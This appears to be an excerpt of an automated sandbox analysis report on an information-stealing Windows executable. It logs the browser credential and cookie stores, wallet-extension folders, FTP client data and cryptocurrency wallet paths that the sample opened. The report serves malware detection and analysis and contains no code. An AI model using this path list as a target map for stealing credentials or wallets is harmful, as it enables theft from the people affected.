Source: SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\FAAGWHBVUU	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\FAAGWHBVUU	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
